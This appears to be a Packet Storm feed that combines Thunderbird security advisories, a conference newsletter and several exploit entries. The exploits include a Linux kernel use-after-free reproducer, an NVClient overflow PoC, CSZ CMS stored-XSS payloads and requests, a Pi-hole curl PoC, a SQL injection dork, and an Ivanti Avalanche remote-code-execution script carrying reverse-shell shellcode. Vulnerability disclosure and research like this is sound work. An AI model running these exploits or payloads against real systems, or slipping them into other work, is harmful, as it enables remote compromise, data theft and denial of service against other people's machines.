Ubuntu Security Notice 6333-1 - Junsung Lee discovered that Thunderbird did not properly validate the text direction override unicode character in filenames. An attacker could potentially exploits this issue by spoofing file extension while attaching a file in emails. Max Vlasov discovered that Thunderbird Offscreen Canvas did not properly track cross-origin tainting. An attacker could potentially exploit this issue to access image data from another site in violation of same-origin policy.

    =========================================================================Ubuntu Security Notice USN-6333-1September 04, 2023thunderbird vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Thunderbird.Software Description:- thunderbird: Mozilla Open Source mail and newsgroup clientDetails:Junsung Lee discovered that Thunderbird did not properly validate the textdirection override unicode character in filenames. An attacker couldpotentially exploits this issue by spoofing file extension while attachinga file in emails. (CVE-2023-3417)Max Vlasov discovered that Thunderbird Offscreen Canvas did not properlytrack cross-origin tainting. An attacker could potentially exploit thisissue to access image data from another site in violation of same-originpolicy. (CVE-2023-4045)Alexander Guryanov discovered that Thunderbird did not properly update thevalue of a global variable in WASM JIT analysis in some circumstances. Anattacker could potentially exploit this issue to cause a denial of service.(CVE-2023-4046)Mark Brand discovered that Thunderbird did not properly validate the sizeof an untrusted input stream. An attacker could potentially exploit thisissue to cause a denial of service. (CVE-2023-4050)Multiple security issues were discovered in Thunderbird. If a user weretricked into opening a specially crafted website in a browsing context, anattacker could potentially exploit these to cause a denial of service,obtain sensitive information, bypass security restrictions, cross-sitetracing, or execute arbitrary code. (CVE-2023-4047, CVE-2023-4048,CVE-2023-4049, CVE-2023-4055, CVE-2023-4056)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:  thunderbird                     1:102.15.0+build1-0ubuntu0.23.04.1Ubuntu 22.04 LTS:  thunderbird                     1:102.15.0+build1-0ubuntu0.22.04.1Ubuntu 20.04 LTS:  thunderbird                     1:102.15.0+build1-0ubuntu0.20.04.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6333-1  CVE-2023-3417, CVE-2023-4045, CVE-2023-4046, CVE-2023-4047,  CVE-2023-4048, CVE-2023-4049, CVE-2023-4050, CVE-2023-4055,  CVE-2023-4056Package Information:  https://launchpad.net/ubuntu/+source/thunderbird/1:102.15.0+build1-0ubuntu0.23.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:102.15.0+build1-0ubuntu0.22.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:102.15.0+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6333-1

Debian Linux Security Advisory 5488-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5488-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
September 03, 2023                    https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2023-4573 CVE-2023-4574 CVE-2023-4575 CVE-2023-4581  
                 CVE-2023-4584

Multiple security issues were discovered in Thunderbird, which could  
result in denial of service or the execution of arbitrary code.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:102.15.0-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:102.15.0-1~deb12u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmT0cUsACgkQEMKTtsN8  
TjZyyg//amaTOqpvk6JD06P7vQkQoQ5fLFlu9QsLU0ziz4Xu+PRihErytIO8KKBu  
wqCTihgptvvxuAUEEjniQXU4LVRBoN9KnlOvDYxl4iIhNT0qiPBqccnGr4NE/WMI  
GXQKDDmbis9A9UimmPtNk8HXjtXAgEvqQY/ni73cWhPtmvAoKzcel6J0l4qMQBxG  
zR57rxNmizxNNqITloRRvWs8aNuKCj47lGlLLsoHjp1mqyCBR6RYr1+HBCLUXsuy  
8aVhqcVh7NrbrKu69UjAdCyHUb0h4U7mjjJwWDzUFi8LOWPsNu3seXHgL2U0LaqP  
+s2FxOI7N8augXx+lc4wArn692xxu6//QWCclQupYVcRDQOOdBs2BjElGKvD4VNL  
w3kj1cqMaaCEARaRrgKrx0szCQgy2ibtDgZ9RdaC2kc0xDdlTGopP3bBjjt1S4u6  
hvgJldUz8HdmOwcr6xQAj7bUpDXc7B7xeKWzZKE1rFksz76yF/eCDo+0vANy2vhd  
5q+ub2lziPwiF8IoCs26uKfYbTNI6SNwahHmY1nHLRxPHPqsitTG4ftBxJ8E4CN/  
pIX+rWAbNa/Er3XQeefVOASvWL2Nf/vOhtGsqiVopd2dGhv4vh2oY9w28YvIM786  
SlRceaM+7RGXXPPzWYxNWLTbIIkX/x8Gn8UCz+Wus9udIOIrbyU=/dxn  
-----END PGP SIGNATURE-----

Debian Security Advisory 5488-1

jSQL Injection is a lightweight application used to find database information from a distant server. jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in various other distributions like Pentest Box, Parrot Security OS, ArchStrike and BlackArch Linux. This is the source code release.

jSQL Injection 0.92

There is a race between mbind() and VMA-locked page faults in the Linux 6.4 kernel, leading to a use-after-free condition.

    Linux 6.4: UAF race between mbind() and VMA-locked page fault(tested on git master, at commit 57012c57536f)Summary:There's a race between mbind() and VMA-locked page faults, leading to UAF.You can quickly hit this with a straightforward reproducer that just keeps calling mbind() on one thread and causing page faults on another thread.I'll send a suggested patch in a minute.mbind() replaces vma->vm_policy while only protected by mmap_write_lock(), which can involve freeing the old vma->vm_policy:sys_mbind  kernel_mbind    do_mbind      mmap_write_lock      mbind_range [for each vma in range]        vma_replace_policy          new = mpol_dup(...)          old = vma->vm_policy          vma->vm_policy = new          mpol_put(old)      mmap_write_unlockVMA-locked page fault handling can allocate pages, which requires using the vma->vm_policy:do_user_addr_fault  lock_vma_under_rcu  handle_mm_fault    __handle_mm_fault      handle_pte_fault         do_pte_missing           do_anonymous_page             vma_alloc_zeroed_movable_folio               vma_alloc_folio                 get_vma_policy                   __get_vma_policy                     pol = vma->vm_policy    ***race***                     mpol_get(pol) [conditional on MPOL_F_SHARED]                 [do page allocation]                 mpol_cond_put(pol)  vma_end_readBecause of the mpol_cond_put(pol) call, it should be possible for this to manifest as a UAF write.You can hit this race on a kernel with CONFIG_NUMA and CONFIG_KASAN very quickly (less than a second, I think) with this reproducer - you don't need an actual NUMA system for this, I've tested it in a QEMU VM without NUMA:==============// gcc -pthread -o mbind-vs-pf mbind-vs-pf.c -Wall#define _GNU_SOURCE#include <pthread.h>#include <err.h>#include <unistd.h>#include <sys/syscall.h>#include <sys/mman.h>#include <linux/mempolicy.h>#define SYSCHK(x) ({          \\  typeof(x) __res = (x);      \\  if (__res == (typeof(x))-1L) \\    err(1, \"SYSCHK(\" #x \")\"); \\  __res;                      \\})static char *vma;static void *fault_thread(void *arg) {  while (1) {    // fault in...    *vma = 1;    // ... and zero the PTE again with zap_page_range_single()    SYSCHK(madvise(vma, 0x1000, MADV_DONTNEED));  }}static void mbind_vma(unsigned long policy) {  unsigned long nmask = (1UL << 0);  SYSCHK(syscall(__NR_mbind, vma, 0x1000, policy|0, &nmask, sizeof(nmask)*8+1, 0));}int main(void) {  vma = SYSCHK(mmap((void*)0x100000, 0x1000,        PROT_READ|PROT_WRITE|PROT_EXEC,        MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED_NOREPLACE, -1, 0));  pthread_t thread;  if (pthread_create(&thread, NULL, fault_thread, NULL))    errx(1, \"pthread_create\");  while (1) {    mbind_vma(MPOL_BIND);    mbind_vma(MPOL_INTERLEAVE);  }}==============This will give the following splat:==================================================================BUG: KASAN: slab-use-after-free in vma_alloc_folio+0x93/0x220Read of size 2 at addr ffff888007c0e6f6 by task mbind-vs-pf/556CPU: 3 PID: 556 Comm: mbind-vs-pf Not tainted 6.5.0-rc3-00123-g57012c57536f #304Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014Call Trace: <TASK> dump_stack_lvl+0x36/0x50 print_report+0xcf/0x660[...] kasan_report+0xc7/0x100[...] vma_alloc_folio+0x93/0x220 __handle_mm_fault+0x71b/0x1060[...] handle_mm_fault+0xbe/0x280 do_user_addr_fault+0x196/0x630 exc_page_fault+0x5c/0xc0 asm_exc_page_fault+0x26/0x30[...] </TASK>Allocated by task 555: kasan_save_stack+0x33/0x60 kasan_set_track+0x25/0x30 __kasan_slab_alloc+0x6e/0x70 kmem_cache_alloc+0xf5/0x260 __mpol_dup+0x72/0x1c0 vma_replace_policy+0x20/0xb0 do_mbind+0x379/0x510 kernel_mbind+0x11a/0x130 do_syscall_64+0x3b/0x90 entry_SYSCALL_64_after_hwframe+0x6e/0xd8Freed by task 555: kasan_save_stack+0x33/0x60 kasan_set_track+0x25/0x30 kasan_save_free_info+0x2b/0x50 __kasan_slab_free+0x10a/0x180 kmem_cache_free+0xaa/0x380 vma_replace_policy+0x87/0xb0 do_mbind+0x379/0x510 kernel_mbind+0x11a/0x130 do_syscall_64+0x3b/0x90 entry_SYSCALL_64_after_hwframe+0x6e/0xd8[...]==================================================================If I leave the reproducer running some more, I get other crashes, like in the KASAN internals, that suggest that the reproducer is already causing memory corruption.In case you're curious: I found this by grepping for mmap_write_lock*() calls and looking at most of them to figure out if they do anything interesting to VMAs without taking VMA locks.This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2023-10-26.Found by: jannh@google.com

Linux 6.4 Use-After-Free / Race Condition

NVClient version 5.0 suffers from a stack buffer overflow vulnerability.

    # Exploit Title: NVClient v5.0 - Stack Buffer Overflow (DoS)# Discovered by: Ahmet Ümit BAYRAM# Discovered Date: 2023-08-19# Software Link: http://www.neonguvenlik.com/yuklemeler/yazilim/kst-f919-hd2004.rar# Software Manual: http://download.eyemaxdvr.com/DVST%20ST%20SERIES/CMS/Video%20Surveillance%20Management%20Software(V5.0).pdf# Vulnerability Type: Buffer Overflow Local# Tested On: Windows 10 64bit# Tested Version: 5.0# Steps to Reproduce:# 1- Run the python script and create exploit.txt file# 2- Open the application and log in# 3- Click the "Config" button in the upper menu# 4- Click the "User" button just below it# 5- Now click the "Add users" button in the lower left# 6- Fill in the Username, Password, and Confirm boxes# 7- Paste the characters from exploit.txt into the Contact box# 8- Click OK and crash!#!/usr/bin/env python3exploit = 'A' * 846try:    with open("exploit.txt","w") as file:        file.write(exploit)    print("POC is created")except:    print("POC not created")

NVClient 5.0 Stack Buffer Overflow

CSZ CMS version 1.3.0 suffers from multiple persistent cross site scripting vulnerabilities.

    # Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')# Date: 2023/08/18# CVE: CVE-2023-38911# Exploit Author: Daniel González# Vendor Homepage: https://www.cszcms.com/# Software Link: https://github.com/cskaza/cszcms# Version: 1.3.0# Tested on: CSZ CMS 1.3.0# Description:# CSZ CMS 1.3.0 is affected by a cross-site scripting (XSS) feature that allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Gallery' section and choosing our Gallery. previously created, in the 'YouTube URL' field, this input is affected by an XSS. It should be noted that previously when creating a gallery the "Name" field was vulnerable to XSS, but this was resolved in the current version 1.3.0, the vulnerability found affects the "YouTube URL" field within the created gallery.# Steps to reproduce Stored XSS:Go to url http://localhost/admin/plugin/gallery/edit/2.When logging into the panel, we will go to the "Gallery" section and create a Carousel [http://localhost/admin/plugin/gallery], the vulnerable field is located at [http://localhost/admin/plugin/gallery/edit/2]We edit that Gallery that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL”fields.With the following payload we can achieve the XSSPayload:<div><p title="</div><svg/onload=alert(document.domain)>">#PoC Request:POST http://localhost:8080/admin/plugin/gallery/addYoutube/2 HTTP/1.1Host: localhost:8080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 140Origin: http://localhost:8080Referer: http://localhost:8080/admin/plugin/gallery/edit/2Upgrade-Insecure-Requests: 1gallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )# Date: 2023/08/18# CVE: CVE-2023-38910# Exploit Author: Daniel González# Vendor Homepage: https://www.cszcms.com/# Software Link: https://github.com/cskaza/cszcms# Version: 1.3.0# Tested on: CSZ CMS 1.3.0# Description:# CSZ CMS 1.3.0 is vulnerable to cross-site scripting (XSS), which allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Carousel Wiget' section and choosing our carousel widget created above, in 'Photo URL' and 'YouTube URL' plugin.# Steps to reproduce Stored XSS:Go to url http://localhost/admin/carousel.We edit that Carousel that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL” and “Photo URL” fields.We can inject HTML code.With the following payload we can achieve the XSS.Payload:<div><p title="</div><svg/onload=alert(document.domain)>">#PoC Request:POST http://localhost:8080/admin/carousel/addUrl/3 HTTP/1.1Host: localhost:8080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 137Origin: http://localhost:8080Referer: http://localhost:8080/admin/carousel/edit/3Upgrade-Insecure-Requests: 1carousel_type=multiimages&photo_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add

CSZ CMS 1.3.0 Cross Site Scripting

nullcon Goa 2023 will be having a live bug hunting competition to win money. Registration deadline is September 7, 2023. The conference will be held September 22nd through the 24th, 2023.

Participate in Live Bug Hunting at Nullcon Goa 2023 and stand a chance to win rewards up to ₹ 10,00,000. Registrations for Winja CTF are on.

Live Bug Hunting: Hack Your Way To Win Up To ₹ 10,00,000

Some really rewarding opportunities are coming your way this Nullcon Goa 2023. Make the most of your conference journey by displaying your hacking talents with Airtel and Fractal.

Registration Deadline: 7th September 2023

Dates: 22nd-24th September 2023

← Submit My Application →  
(https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVQVf522ffsjW62LVVP9lYGxsW6tdK5Q531g70N4xH9dl3lcq-W6N1vHY6lZ3pbW70YMCd8jsQ-gW7_Gn4D4rnMwMVsbLtM4yzqGyW55rtPB5g4bM7W5h1VLy2dT8_nW7yd2rv8FDN_6W6PnDb01RmkFYW5KrMw05xLw7LN8__9pP2dnYhW6wc8nC4lkM6qW86rTl02PfzkrW6_mwlV4wC53_W7R4yYc339zB2W7ycBvF5fgd_bW3G3DgW6CkvYtW3sqQFX4FWDjgW3S-_v24_pStpN3k4x-vL7TYgW379tgr6vlNw_W2LsBbQ59gZ71W59V3rb47MQknV3lqsv7K8xPFf8RqGXT04 )

🔔 Talks You Can't Miss Out On At Nullcon Goa 2023 🔔

Conference Dates: 23rd-24th September 2023 | Venue: Birla Institute Of Technology And Science (BITS)

iOS and macOS Track: Self-Signed, Why Not! Exploiting Insecure Certificate Validation In iOS And macOS

By Aapo Oksman

iOS and macOS Track: Jailbreaking The Apple HomePod - Fun With checkm8 & Smart Speakers

By Tihmstar & Linus Henze

BountyCraft Track: Lens Of Deceit: Unmasking And Altering Camera Sunglasses' Footage

By Daniel Schwendner

Developer Track: (In)Secure Host Key Verification - Are SSHFP DNS Records The 'Next Big Thing'?

By Sebastian Neef

Explore More Talk Sessions  
(https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVQVf522ffsjW62LVVP9lYGxsW6tdK5Q531g70N4xH9dl3lcq-W6N1vHY6lZ3p8W2sSP2J12G3YRW4KZkdM691NY0W7xF8mX3yRBkVW1NmWP4100qFFW4G3Kth4wmwGsW5zkdcF434tydW6WBlHB4y2WTJW18m5TZ87TrSSW3vTQRb63BZWJW7BmXVK7rx-PkW2zXJ655D7DjtW8jH2hT7Bp9Y5N6pp35q-fF4lW3gb-yQ1s1kD8W6djNYS6M_3_yW2-21-q8cqPlSW2DMFMw3FjHH1N5ZYVbwWp9QVW2dgb4Q6c7B-4W5gqhJ03kNxkYW2yqGTl7dVXc1W3VzqCY86B3wBf42654404 )

🛠️ Training Schedule For Nullcon Goa 2023 Is Up 🛠️

Set up your laptop, refer to the prerequisites, and get yourself a coffee because Nullcon Goa 2023 Hands-On Training is right around the corner.

Batch 1 Training Session: 20th-22nd September 2023

Batch 2 Training Session: 25th-27th September 2023

Please Note:

*The training pass does not provide access to the conference and the conference pass does not provide access to the training.

**Participants can only attend the training they have registered for; switching training is prohibited.

Checkout The Training Schedule  
(https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVQVf522ffsjW62LVVP9lYGxsW6tdK5Q531g70N4xH9dl3lcq-W6N1vHY6lZ3nLVWMmf25tY-7HW7nhhS-46Z0SPW3cpKyz2GH6q3W8Q1NC66Lwp2MW3-Dr3v1Q5D5TW3PLy6G6zrqDBW4fXfdb3BqWLBW1_t4v27QXsBMW7tggJj6yP-QQW9j-9wt2dtwQ4W6SbTZQ3LwX_rW40lD6j9cGKDPV7T9Mg8_LWwHW2k0HZf3Dtr6nW88R8LX6V1BDnW314HRd68DbNWW2jXJmK1790F0W5gPvXc8p-yfcW7QMB_87sbcPDW1mCpmp6-71XBW3TSx0d7QtvbyW2dM8Mr18bK3vf3-HsfF04 )

⚔️ Winja Capture The Flag ⚔️

This Year Our World Is "Literally" Taken Over By Artificial Intelligence

Know More About Prizes  
(https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVQVf522ffsjW62LVVP9lYGxsW6tdK5Q531g70N4xH9dl3lcq-W6N1vHY6lZ3nBW6NZnj98mw05YVQ4PZv1NPS3wW19DBPq8M1z4kW4n0x3q6yQhKVW6FdGl062c0BjVv4sv_2Gzks5W3R2Gwm2sTvf-W627m6r6kYRbdW4cJ-jP1J8tRDW39FZ0v6TdWKkW1RDCm94S6zWgVxNVgt4J6TYxW3M6brg87kLBJW5Wt5gD5CCclHW1fNfQ82NlpGDW9266qZ8RldWmW3x_9Gn4Hy-RXW5W0txR5bGBtlW3GhZPF68d1ZlW98h3dM5KgxmMW6WlcBF575fbxW7QzNhV4Mf0Qqf7fVhR404 )

📰 Read What People Have To Say About Nullcon 📰

How Nullcon fosters diversity to help plug the infosec skills gap

At Asia’s largest international security conference, we nurture this enthusiasm by providing an environment that is fun, social and welcoming to anyone – regardless of identity, background or experience level. The result is an impressive diversity of attendees, speakers and participants. Read More! (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVQVf522ffsjW62LVVP9lYGxsW6tdK5Q531g70N4xH9cs5jMY8W50kH_H6lZ3p6W1Qxbfp1jTCWdW2--LFM4VVqzHW2ZT-Sk1MfWm4W7V8v6D6ybzP1W42zKFm366WysW5BCcBC6BkTYmW6Cxzwx8_F49SW7PKwgx2GN19ZW23ZFNY6hF38WW3xV_3F1NTjbDW2HTlyp3B5-KsW9gx18t60SccyW6C2lY08mMn-PN8Bq2xN3_9SvMFnjYQJV7-8W3Rfyw88jcZv_N2s8QvLMcMSVW15_-mZ5Mph4fN8zchFg3Myc0W8J37wC80cXfZW3pM8DS4nVCcWW1N7R561M4fZ4W6gQpwd3cnZR-VPfQZ_8BhCVCW20XSdV79wFWRW3hG4zc8VT71zW713Wjl66t0SpVrYr9g35DZScW74rg7d7WfFTlW7YM_pR7yn9v3W8WWp706GzhWvW57N2HT82BK3zf34xmMH04 )

Nullcon Goa 2023 lineup features Apple HomePod jailbreak, Ray-Ban Stories hack and ‘smashing the state machine’

Azure Machine Learning bugs, Jailbreaking the Apple HomePod, and a keynote from Microsoft’s security research chief are among the technical talks we can look forward to at Nullcon Goa 2023. Read More! (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVQVf522ffsjW62LVVP9lYGxsW6tdK5Q531g70N4xH9dl5jMY8W6N1X8z6lZ3mGW1ZyT4s9b_-GZN6Wp5VdkX0lYW86_VPY15qdswW5c5VHH5XrnZ3W3qkZ9D6FXcGXW8CslCv8rW1dqN4Qw5jp73SgvN5fz1M42J-h2W3qgJHr3PPnMlW9dZkxG23sHw7N3qgqQ6-7BdLW7mBr5q3bH_RXW2Ntf5X49N4JSW3HZzmV2HrcPVW5468V42dZx-QW6zX2dT34GzZvW2nCCzh1dGy0FW45XbD45XqZ0tW4lcY776kdLTwW2w5Tcq3vn0dfW2hq3j92QnL7VW66X6Ld7SGT-7W3NlhKQ2L9MJKW3dy46g4Q2yvzW3pK-jR2h2glxN3hgLPbz5m-hVH9GGT95L0B5W4ndyjf13n5RNW8C_bRw6Cwk_fW5S44ff3PdzMqW8SdN3C1S76s_W6lSFnq61Q1kVW2DpPwF5SqSPQW7k4qcX1RxVJPW4_WpJb1GMrSmW4v8YhT7kgwcnW2Yd2Zq8bQ7vlW6XlT5j6F3WYVf6YzQPM04 )

Nullcon Goa 2023 Supporters:

Thankyou #TeamNullcon

Payatu Technologies Pvt. Ltd., Office No. 502, Tej House, 5th Floor, 5 MG Road, Camp, Pune, Maharashtra 411001, India

Unsubscribe (https://hs-7328024.s.hubspotstarter.net/email-unsubscribe/email?product=emailStarter&checkSubscriptions=all&d=Vnlmhl5Z60tRW1hZ9wn3_VrSDW3T1MdZ2m7LY3W3XWJ1t4fLN6SW4cJ1zp49M9spN1JDwVNXhR99M88nPzNw4-tW9bShvh5PVlgyVCSGTD9m4_KyW6_jZl-6CplXhW1PRjpY7jDJDWW672sjD4t5SpWW8zPJXp2wy-4zf1vKHwV04&v=2&email=submissions%40packetstormsecurity.org&_hsenc=p2ANqtz--iDbP3lqsi0AJ5yEegCohoaUJ3iz-advUmWKbrN0TOkqYYT-vYezcLwKLzlHp7OFPWJJO_sXD7w-lMy3U6eBdvrl00uNtq3SXMkVhzlrRlatGL-mY&_hsmi=272853448 )

Manage preferences (https://hs-7328024.s.hubspotstarter.net/email-unsubscribe/email?product=emailStarter&d=Vnlmhl5Z60tRW1hZ9wn3_VrSDW3T1MdZ2m7LY3W3XWJ1t4fLN6SW4cJ1zp49M9spN1JDwVNXhR99M88nPzNw4-tW9bShvh5PVlgyVCSGTD9m4_KyW6_jZl-6CplXhW1PRjpY7jDJDWW672sjD4t5SpWW8zPJXp2wy-4zf1vKHwV04&v=2&email=submissions%40packetstormsecurity.org&_hsenc=p2ANqtz--iDbP3lqsi0AJ5yEegCohoaUJ3iz-advUmWKbrN0TOkqYYT-vYezcLwKLzlHp7OFPWJJO_sXD7w-lMy3U6eBdvrl00uNtq3SXMkVhzlrRlatGL-mY&_hsmi=272853448 )

nullcon Goa 2023 Live Bug Hunting

AdminTLE PiHole versions prior to 5.18 suffer from a broken access control vulnerability.

    # Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control# Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554)# Date: 21.12.2022# Exploit Author: kv1to# Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17# Tested on: Raspbian / Debian# Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497# CVE : CVE-2022-23513In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on queryads endpoint.## Proof Of Concept with curl:curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>'## HTTP requestsGET /admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>' HTTP/1.1HOST: pi.holeCookie: [..SNIPPED..][..SNIPPED..]## HTTP ResponseHTTP/1.1 200 OK[..SNIPPED..]data: Match found in [..SNIPPED..]data: <domain>data: <domain>data: <domain>

AdminLTE PiHole Broken Access Control

Ivanti Avalanche versions prior to 6.4.0.0 suffer from a remote code execution vulnerability.

    """Exploit Title: Ivanti Avalanche <v6.4.0.0 - Remote Code ExecutionDate: 2023-08-16Exploit Author: Robel Campbell (@RobelCampbell)Vendor Homepage: https://www.ivanti.com/Software Link: https://www.wavelink.com/download/Downloads.aspx?DownloadFile=27550&returnUrl=/Download-Avalanche_Mobile-Device-Management-Software/Version: v6.4.0.0Tested on: Windows 11 21H2CVE: CVE-2023-32560Reference: https://www.tenable.com/security/research/tra-2023-27"""import socketimport structimport sys# Create an item structure for the header and payloadclass Item:    def __init__(self, type_, name, value):        self.type = type_        self.name = name.encode()        self.value = value        self.name_size = 0x5        self.value_size = 0x800    def pack(self):        return struct.pack('>III{}s{}s'.format(self.name_size, self.value_size),                           self.type, self.name_size, self.value_size, self.name, self.value)# Create a header structureclass HP:    def __init__(self, hdr, payload):        self.hdr = hdr        self.payload = payload        self.pad = b'\x00' * (16 - (len(self.hdr) + len(self.payload)) % 16)    def pack(self):        return b''.join([item.pack() for item in self.hdr]) + \               b''.join([item.pack() for item in self.payload]) + self.pad# Create a preamble structureclass Preamble:    def __init__(self, hp):        self.msg_size = len(hp.pack()) + 16        self.hdr_size = sum([len(item.pack()) for item in hp.hdr])        self.payload_size = sum([len(item.pack()) for item in hp.payload])        self.unk = 0  # Unknown value    def pack(self):        return struct.pack('>IIII', self.msg_size, self.hdr_size, self.payload_size, self.unk)# Create a message structureclass Msg:    def __init__(self, hp):        self.pre = Preamble(hp)        self.hdrpay = hp    def pack(self):        return self.pre.pack() + self.hdrpay.pack()# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.86.30 LPORT=4444 exitfunc=thread -f pythonshellcode =  b""shellcode += b"fce8820000006089e531c064"shellcode += b"8b50308b520c8b52148b7228"shellcode += b"0fb74a2631ffac3c617c022c"shellcode += b"20c1cf0d01c7e2f252578b52"shellcode += b"108b4a3c8b4c1178e34801d1"shellcode += b"518b592001d38b4918e33a49"shellcode += b"8b348b01d631ffacc1cf0d01"shellcode += b"c738e075f6037df83b7d2475"shellcode += b"e4588b582401d3668b0c4b8b"shellcode += b"581c01d38b048b01d0894424"shellcode += b"245b5b61595a51ffe05f5f5a"shellcode += b"8b12eb8d5d68333200006877"shellcode += b"73325f54684c772607ffd5b8"shellcode += b"9001000029c454506829806b"shellcode += b"00ffd5505050504050405068"shellcode += b"ea0fdfe0ffd5976a0568c0a8"shellcode += b"561e680200115c89e66a1056"shellcode += b"576899a57461ffd585c0740c"shellcode += b"ff4e0875ec68f0b5a256ffd5"shellcode += b"68636d640089e357575731f6"shellcode += b"6a125956e2fd66c744243c01"shellcode += b"018d442410c6004454505656"shellcode += b"5646564e565653566879cc3f"shellcode += b"86ffd589e04e5646ff306808"shellcode += b"871d60ffd5bbe01d2a0a68a6"shellcode += b"95bd9dffd53c067c0a80fbe0"shellcode += b"7505bb4713726f6a0053ffd5"buf = b'90' * 340buf += b'812b4100' # jmp esp (0x00412b81)buf += b'90909090'buf += b'90909090'buf += shellcodebuf += b'41' * 80buf += b'84d45200' # stack pivot: add esp, 0x00000FA0 ; retn 0x0004 ; (0x0052d484)buf += b'43' * (0x800 - len(buf))buf2 = b'41' * 0x1000# Create message payloadhdr = [Item(3, "pwned", buf)]payload = [Item(3, "pwned", buf2)] # dummy payload, probabaly not necessaryhp_instance = HP(hdr, payload)msg_instance = Msg(hp_instance)# Default portport = 1777# check for target host argumentif len(sys.argv) > 1:    host = sys.argv[1]else:    print("Usage: python3 CVE-2023-32560.py <host ip>")    sys.exit()with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:    s.connect((host, port))    s.sendall(msg_instance.pack())    print("Message sent!")    s.close()

Ivanti Avalance Remote Code Execution

ImpressionTech CMS version 1.4 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : ImpressionTech CMS ٍv1.4 Sql injection Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit)                                            || # Vendor    : http://www.imprtech.com/                                                                                           |  | # Dork      : "Website | Impression Technologies LLC"  .php?id=                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use Payload : /news.php?id=58[+] http://127.0.0.1/xxxxxxxxxx.com/news.php?id=58 <======= inject hereGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Source

Packet Storm